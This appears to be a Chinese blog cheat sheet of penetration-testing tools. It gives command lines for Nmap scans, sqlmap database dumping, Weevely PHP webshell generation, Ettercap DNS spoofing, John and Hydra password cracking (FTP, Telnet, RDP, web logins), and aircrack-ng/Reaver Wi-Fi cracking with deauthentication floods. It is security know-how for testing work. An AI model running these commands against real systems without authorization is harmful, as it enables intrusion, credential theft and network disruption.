渗透测试常用工具

### nump ###

Nmap四种最基本扫描方式:TCP connect()端口扫描、TCP同步(SYN)端口扫描、UDP端口扫描、Ping扫描

namp –[sT] TCP扫描 –[sS]TCP同步扫描 –[sU] UDP扫描 –[sP] ping扫描 –[p] 扫描端口(0-100) –[O] 主机

### Nessus:登录>新建策略(添加所需插件程序)>新建扫描任务 ###

### OpenVASOPenVAS配置>新建Scan Config(扫描类型)>创建扫描目标>新建扫描任务 ###

OpenVAS图形界面:应用程序>KaliLinux>漏洞分析>OpenVAS>openvas-gsd命令

新建Scan Config:Configuration>Scan Configs>New Scan Config>设置扫描名称|Base|扫描内容

         扫描类型:Brute force attacks|CISCO|Databases|FTP|Firewalls|Netware|RPC|SNMP

新建目标:Configuration>Targets>New Target>设置target名称|扫描的主机>Create Target

新建任务:Scan Management>New Task>设置任务名称|Scan Config|Scan Targets>Create Task>Start

扫描本地漏洞-扫描网络漏洞-扫描指定Linux系统漏洞-扫描指定Windows系统漏洞

### SQLMAP: 输入 输出 网络通信(发送接受数据)攻击模块(注入点探测  真正攻击模块) ###

     创建配置文件:sqlsus -g [filename]>加入shell:sqlsus filename >注入测试:sqlsus> start

sqlmap-access/sqlmap-mysql/oracle/sqlserver:

     sqlmap -u URL

     sqlmap -u URL --dbs

     sqlmap -u URL --tables -D Database_Name

     sqlmap -u URL --columns -D Database_Name – T Table_Name

     sqlmap -u URL --dump -D Database_Name -T Table_Name -C Column_Name

### Burpsuitetaget|proxy|spider|scanner|intruder|repeater|decoder ###

burpsuite安装配置:配置JDK>下载(wget http://burpsuite.jar)>执行(java -Xmx2g -jar burpsuite.jar)

扫目录-暴力破解网站后台-破解伪随机码rand(预测验证码漏洞)-半自动注入-上传突破-织梦本地包含利用-任意命令执行(当URI 数据为include()函数参数时,提交POST PHP命令执行)-突破安全狗提权-开裤渗透-绕过d盾继续注入-会话控制安全cookies/seesion

### Weevely ###

生成.php木马:weevely generate <password> [<path>] >上传木马:上传漏洞>连接后门&WebShell:weevely <url> <password>

### Ettercap ###

下载>解压>安装编译源码所需依赖库>编译>开始攻击:sudo ettercap -Tq -I <interface> -P dns_spoof

### SET ###

使用SET实施攻击:钓鱼性攻击向量-Web攻击向量-PowerShell攻击向量

### unshadowjohn ###

创建用户密码:useradd <username> [-d <home_dir>] [-s <bash>] passwd <username>

收集密码密文:unshadow <passwd_file> <shadow_file> > <output_file>

尝试破解:john <pw.list>

### HydraFTP/HTTP/HTTPS/MySQL/MS SQL/Oracle/Cisco/IMAP/VNC密码破解 ###

启动Hydra:hydra-gtk >>设置目标地址、端口、协议 >>指定用户名和密码列表文件

ftp破解:hydra ip ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV

hydra ip ftp -l 用户名 -P 密码字典(/root/Desktop/pwd.txt) -e ns -vV

Telnet破解:hydra ip telnet -l 用户 -P 密码字典 -t 32 -s 23 -e ns -f -V

RDP破解(远程桌面协议):hydra ip rdp -l administrator -P pass.txt -V

Web登录破解(GET):hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip http-get /admin/

Web登录破解(POST):hydra -l admin -p pass.txt -o out.txt -f ip http-post-form “cookie”

### CDLinux破解Wifiminidwep-gtk + ReaverPIN(路由器WPS)/EWSA跑字典(握手包) ###

reaver -i mon0 -b Mac地址 -c 9 -a -v -S -x 20 -r 100:10 -l 300

### KaliLinux破解Wifi : aircrack-ng ###

airmon-ng start wlan0 #启动网卡监听模式 ifconfig显示wlan0mon表示成功 #wlan0外置网卡/无线网卡

airodump-ng wlan0mon #扫描wifi信息,ctrl+c停止

       BSSID(路由的MAC地址)、PWR(信号强度,越小信号越强)、#Data(传输的数据)

CH(信号频道,只有在一个频道才可进行下一步操作)、ESSID(wifi名称)

       airodump-ng -c (频道) --bssid B0:D5:9D:84:39:1E -w /root wlan0mon  #-c wifi所在频道 -w握手包目录

       aireplay-ng -0 0 -a MAC地址 wlan0mon #deauth洪水攻击,取消目标路由和所有设备无线连接,设备会重新连接,抓取握手包

       aircrack-ng -w /dic/wordlist.txt /root-xx.cap #字典破解 -w字典目录,root-xx.cap握手包

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值